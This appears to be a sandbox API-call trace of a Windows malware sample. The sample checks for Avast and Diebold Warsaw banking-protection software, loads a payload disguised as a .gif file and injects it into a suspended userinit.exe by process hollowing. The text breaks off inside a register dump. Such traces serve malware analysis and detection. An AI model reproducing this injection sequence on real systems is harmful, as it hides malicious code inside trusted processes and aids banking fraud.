[0147.809] GlobalUnlock (hMem=0x1890004) returned 0
[0147.817] Sleep (dwMilliseconds=0xe74e)
[0157.850] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0157.850] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0157.851] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0157.851] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0157.851] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120
[0157.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0157.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0157.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0157.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0157.853] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0157.853] ReadFile (in: hFile=0x120, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0157.855] CloseHandle (hObject=0x120) returned 1
[0157.855] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.856] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.856] GlobalUnlock (hMem=0x189000c) returned 0
[0157.856] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0157.856] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.857] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.857] GlobalUnlock (hMem=0x189000c) returned 0
[0157.857] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0157.857] GlobalLock (hMem=0x189000c) returned 0x25f110
[0157.858] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0157.858] GlobalUnlock (hMem=0x189000c) returned 0
[0157.858] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0157.858] GlobalLock (hMem=0x189000c) returned 0x265120
[0157.859] GlobalHandle (pMem=0x265120) returned 0x189000c
[0157.859] GlobalUnlock (hMem=0x189000c) returned 0
[0157.859] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0157.859] GlobalLock (hMem=0x189000c) returned 0x265120
[0157.860] GlobalHandle (pMem=0x265120) returned 0x189000c
[0157.860] GlobalUnlock (hMem=0x189000c) returned 0
[0157.860] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0157.860] GlobalLock (hMem=0x189000c) returned 0x26f130
[0157.861] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0157.861] GlobalUnlock (hMem=0x189000c) returned 0
[0157.861] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0157.861] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.862] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.862] GlobalUnlock (hMem=0x189000c) returned 0
[0157.862] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0157.862] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.862] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.862] GlobalUnlock (hMem=0x189000c) returned 0
[0157.862] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0157.862] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.863] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.863] GlobalUnlock (hMem=0x189000c) returned 0
[0157.863] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0157.863] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.864] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.864] GlobalUnlock (hMem=0x189000c) returned 0
[0157.864] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0157.864] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.865] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.865] GlobalUnlock (hMem=0x189000c) returned 0
[0157.865] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0157.865] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.866] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.866] GlobalUnlock (hMem=0x189000c) returned 0
[0157.866] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0157.866] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.866] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.866] GlobalUnlock (hMem=0x189000c) returned 0
[0157.866] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0157.867] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.867] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.867] GlobalUnlock (hMem=0x189000c) returned 0
[0157.867] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0157.867] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.868] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.868] GlobalUnlock (hMem=0x189000c) returned 0
[0157.868] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0157.868] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.869] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.869] GlobalUnlock (hMem=0x189000c) returned 0
[0157.869] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0157.870] GlobalLock (hMem=0x189000c) returned 0x27b110
[0157.871] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0157.871] GlobalUnlock (hMem=0x189000c) returned 0
[0157.871] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0157.871] GlobalLock (hMem=0x189000c) returned 0x27b110
[0157.871] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0157.871] GlobalUnlock (hMem=0x189000c) returned 0
[0157.871] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0157.873] GlobalLock (hMem=0x189000c) returned 0x29f120
[0157.874] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0157.874] GlobalUnlock (hMem=0x189000c) returned 0
[0157.874] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0157.874] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.875] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.875] GlobalUnlock (hMem=0x189000c) returned 0
[0157.875] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0157.875] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.875] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.875] GlobalUnlock (hMem=0x189000c) returned 0
[0157.875] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0157.875] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.876] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.876] GlobalUnlock (hMem=0x189000c) returned 0
[0157.876] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0157.876] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.877] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.877] GlobalUnlock (hMem=0x189000c) returned 0
[0157.877] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0157.877] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.877] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.877] GlobalUnlock (hMem=0x189000c) returned 0
[0157.877] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0157.877] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.878] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.878] GlobalUnlock (hMem=0x189000c) returned 0
[0157.878] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0157.878] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.879] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.879] GlobalUnlock (hMem=0x189000c) returned 0
[0157.879] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0157.879] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.880] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.880] GlobalUnlock (hMem=0x189000c) returned 0
[0157.880] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0157.880] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.880] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.880] GlobalUnlock (hMem=0x189000c) returned 0
[0157.880] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0157.880] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.881] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.881] GlobalUnlock (hMem=0x189000c) returned 0
[0157.881] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0157.881] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.882] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.882] GlobalUnlock (hMem=0x189000c) returned 0
[0157.882] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0157.882] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.883] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.883] GlobalUnlock (hMem=0x189000c) returned 0
[0157.883] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0157.883] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.883] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.883] GlobalUnlock (hMem=0x189000c) returned 0
[0157.883] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0157.884] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.884] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.884] GlobalUnlock (hMem=0x189000c) returned 0
[0157.884] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0157.884] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.885] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.885] GlobalUnlock (hMem=0x189000c) returned 0
[0157.885] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0157.885] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.886] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.886] GlobalUnlock (hMem=0x189000c) returned 0
[0157.886] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0157.886] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.887] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.887] GlobalUnlock (hMem=0x189000c) returned 0
[0157.887] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0157.887] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.888] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.888] GlobalUnlock (hMem=0x189000c) returned 0
[0157.888] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0157.888] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.889] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.889] GlobalUnlock (hMem=0x189000c) returned 0
[0157.889] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0157.889] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.890] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.890] GlobalUnlock (hMem=0x189000c) returned 0
[0157.890] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0157.890] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.890] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.890] GlobalUnlock (hMem=0x189000c) returned 0
[0157.890] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0157.890] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.891] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.891] GlobalUnlock (hMem=0x189000c) returned 0
[0157.891] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0157.891] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.892] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.892] GlobalUnlock (hMem=0x189000c) returned 0
[0157.892] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0157.892] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.893] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.893] GlobalUnlock (hMem=0x189000c) returned 0
[0157.893] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0157.893] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.893] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.893] GlobalUnlock (hMem=0x189000c) returned 0
[0157.893] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0157.893] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.894] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.894] GlobalUnlock (hMem=0x189000c) returned 0
[0157.894] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0157.894] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.895] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0157.895] GlobalUnlock (hMem=0x189000c) returned 0
[0157.895] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0157.895] GlobalLock (hMem=0x189000c) returned 0x25b100
[0157.896] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x11c, hThread=0x120, dwProcessId=0x710, dwThreadId=0x6f8)) returned 1
[0157.945] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0157.946] GetThreadContext (in: hThread=0x120, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0xd82be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14fca0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0157.997] ReadProcessMemory (in: hProcess=0x11c, lpBaseAddress=0x7ffd5008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0157.997] VirtualAllocEx (hProcess=0x11c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0157.998] VirtualAlloc (lpAddress=0x1b64000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1b64000
[0158.003] WriteProcessMemory (in: hProcess=0x11c, lpBaseAddress=0x400000, lpBuffer=0x1b62fa0*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b62fa0*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0158.014] WriteProcessMemory (in: hProcess=0x11c, lpBaseAddress=0x7ffd5008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0158.015] SetThreadContext (hThread=0x120, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, 